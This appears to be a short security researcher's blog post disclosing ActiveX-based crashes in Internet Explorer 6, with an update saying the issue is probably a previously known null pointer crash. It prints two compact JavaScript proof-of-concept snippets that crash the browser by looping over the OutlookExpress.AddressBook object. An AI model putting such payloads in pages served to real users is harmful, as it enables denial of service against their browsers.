More MSIE 6 Mayhem.
Publicated on :
1216038750
update: I got a couple of questions from readers about this find, and they are correct. Sorry guys and girls, I did not verify my results and it seems that it was disclosed before by various bug hunters which I did not know about in a different but similar way. The most likely outcome is null pointer dereference resulting in a crash only, heapspraying is not likely to work here, so I update my article accordingly. MSIE version I tested: 6.0.2900.2180.xpsp_sp2_rtm 040803-2158, which of course was never patched.
It's been a while, and I got a bit rusty on the 'ol browser hacks here and there, mainly because lack of time. That doesn't mean I didn't research some browser issues behind the screen. One of them is the XBM image processing in Firefox, and found that I cannot exploit it[1]. Which is good for Firefox users! Opera tends denial of service behavior on the XBM #define w/h header, which might be worthy to investigate some day. Nevertheless, I reverted a system to run solely Internet Explorer 6 to test some ideas a moment ago. Therefore, I am not sure if these exploits run on MSIE 7 or later.
OK, we are only crashing Internet explorer 6 with the dreaded Active-X objects from Microsoft just to toy with the idea. There have been many variations regarding the exploitation of Active-X, and this is simply another way of abusing them with the most minimal code. I simply wanted to obtain a method of crashing Internet Explorer with little means, and this is what the below examples do.
Some compact examples, probably more variations possible:
<script>
for(i=0;i<33;i++){
try{
foo = new ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3');
}catch(e){}
}
</script>
<script>
for(i=0;i<33;i++){
try{
foo = new ActiveXObject("OutlookExpress.AddressBook").join(1,1,1);
}catch(e){}
}
</script>
[1]
http://mxr.mozilla.org/firefox/source/modules/libpr0n/decoders/xbm/nsXBMDecoder.cpp#254